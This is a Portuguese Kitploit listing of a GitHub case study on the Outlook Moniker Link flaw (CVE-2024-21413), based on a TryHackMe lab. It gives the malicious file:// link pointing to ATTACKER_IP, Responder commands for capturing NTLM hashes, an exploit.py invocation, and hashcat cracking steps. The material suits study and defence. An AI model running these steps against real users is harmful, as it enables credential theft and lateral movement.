Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/pedro-lucas-melo/estudo-de-caso-cve-2024-21413
Quebra de SenhasAnálise de VulnerabilidadesExploraçãoMovimento LateralPhishingCTFAprendizado e EducaçãoSegurança de EmailLabs e Prática

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHubpedro-lucas-melo/estudo-de-caso-cve-2024-21413

Estudo-de-Caso-CVE-2024-21413

Um estudo de caso do CVE-2024-21413. Usado como parâmetro a sala do TryHackMe Moniker Link (CVE-2024-21413). Feito edições com claude code no exploit.

Ver Repositório
7há 5 mesesAinda não revisado

CVE-2024-21413 — Moniker Link 🔗💀

Microsoft Outlook RCE + Vazamento de Credenciais NTLM

⚠️ Aviso Legal: Este repositório é exclusivamente para fins educacionais e de pesquisa em segurança. Todas as demonstrações foram realizadas em ambientes controlados e isolados. O uso dessas técnicas contra sistemas sem autorização explícita é ilegal e antiético.


📋 Índice

  • Visão Geral
  • Como a Vulnerabilidade Funciona
  • Ambiente de Laboratório
  • Demonstração Passo a Passo
  • Script do Exploit
  • Diagrama do Ataque
  • Mitigação e Defesa
  • CVE Breakdown
  • Referências

🔍 Visão Geral

CampoDetalhe
CVECVE-2024-21413
Divulgação13 de fevereiro de 2024 (Patch Tuesday)
CVSS Score9.8 (Crítico)
ProdutoMicrosoft Outlook
TipoRCE + Credential Leak (NTLM Hash)
VetorNetwork / E-mail (sem autenticação prévia)
InteraçãoRequer interação do usuário (clicar no link)
ApelidoMoniker Link

A CVE-2024-21413 é uma vulnerabilidade crítica no Microsoft Outlook que permite a um atacante:

  1. Vazar credenciais NTLM da vítima ao forçar uma autenticação SMB automática
  2. Executar código remotamente na máquina alvo através de um link malicioso em e-mail

O nome "Moniker Link" vem da exploração de Component Object Model (COM) Monikers — um mecanismo do Windows para referenciar objetos por string — para contornar as proteções do Outlook contra links file://.


🧠 Como a Vulnerabilidade Funciona

O Problema: Bypass da Protected View

Normalmente, o Outlook bloqueia links file:// que apontam para recursos de rede, exibindo um aviso de segurança (Protected View). A falha está na forma como o Outlook processa URLs que contêm o caractere ! — um separador de Moniker.

A Exploração

Um link malicioso no formato:

root@kitploit:~
file:///\\ATTACKER_IP\share\!something

O caractere ! faz com que o parser do Outlook interprete a URL como uma referência a um COM Moniker, ignorando as verificações de segurança normais. O resultado:

  • A máquina da vítima tenta autenticar-se automaticamente via SMB no servidor do atacante
  • Durante essa autenticação, o hash NTLM da vítima é transmitido
  • Esse hash pode ser usado em ataques de Pass-the-Hash ou quebrado offline

Fluxo Simplificado

root@kitploit:~
Atacante envia e-mail → Vítima clica no link → Outlook processa URL com "!"
→ Bypass da Protected View → Conexão SMB automática → Hash NTLM capturado

🖥️ Ambiente de Laboratório

Para reproduzir este estudo de caso com segurança:

MáquinaSistema OperacionalPapel
AtacanteKali LinuxListener SMB + Exploit
AlvoWindows 10/11 com Outlook vulnerávelVítima

Importante: Use uma rede isolada (NAT ou Host-Only no VirtualBox/VMware). Nunca execute em redes reais.

Ferramentas Necessárias

root@kitploit:~
# Responder — listener SMB/HTTP para captura de hashes
sudo apt install responder

# Python 3 — para rodar o exploit
python3 --version

# Verificar conectividade entre as máquinas
ping <IP_ALVO>

🚀 Demonstração Passo a Passo

Passo 1 — Identificar o IP da Máquina Atacante

root@kitploit:~
ip a | grep inet
# Anote o IP da interface que se comunica com o alvo (ex: 192.168.56.10)

Passo 2 — Iniciar o Responder

O Responder cria um servidor SMB falso que captura hashes de autenticação NTLM.

root@kitploit:~
sudo responder -I eth0 -v
# Substitua eth0 pela sua interface de rede

Saída esperada:

root@kitploit:~
[+] Listening for events...
[SMB] NTLMv2-SSP Client   : 192.168.56.20
[SMB] NTLMv2-SSP Username : DESKTOP-ALVO\usuario
[SMB] NTLMv2-SSP Hash     : usuario::DESKTOP-ALVO:...

Passo 3 — Executar o Exploit

root@kitploit:~
python3 exploit.py \
  --sender [email protected] \
  --recipient [email protected] \
  --server <IP_SERVIDOR_EMAIL> \
  --attacker-ip 192.168.56.10

Passo 4 — Aguardar a Vítima Clicar no Link

Quando a vítima abre o e-mail e clica no link, o Responder captura automaticamente o hash NTLM. Este hash pode ser:

  • Analisado para identificar a conta comprometida
  • Usado em Pass-the-Hash para autenticação lateral na rede
  • Enviado ao Hashcat/John para tentativa de quebra offline:
root@kitploit:~
hashcat -m 5600 hash.txt wordlist.txt

🐍 Script do Exploit

Veja o arquivo exploit.py para o script completo e comentado.


📊 Diagrama do Ataque

Veja o arquivo diagrama-ataque.html para uma visualização interativa do fluxo completo do ataque.


🛡️ Mitigação e Defesa

Veja o arquivo MITIGACAO.md para o guia completo de mitigação e defesa.


📄 CVE Breakdown

Veja o arquivo CVE-BREAKDOWN.md para a análise técnica detalhada da vulnerabilidade.


📚 Referências

  • Microsoft Security Advisory — CVE-2024-21413
  • Morphisec — Moniker Link Research
  • TryHackMe — Moniker Link Room
  • Responder Tool — GitHub
  • NTLM Authentication — Microsoft Docs
  • NVD — CVE-2024-21413

👤 Autor

Estudo de caso desenvolvido como parte de treinamento prático em segurança ofensiva via TryHackMe.

Este projeto segue os princípios de responsible disclosure e ethical hacking. Todo o conteúdo aqui presente visa a educação e a melhoria da postura de segurança.

Baixar ferramenta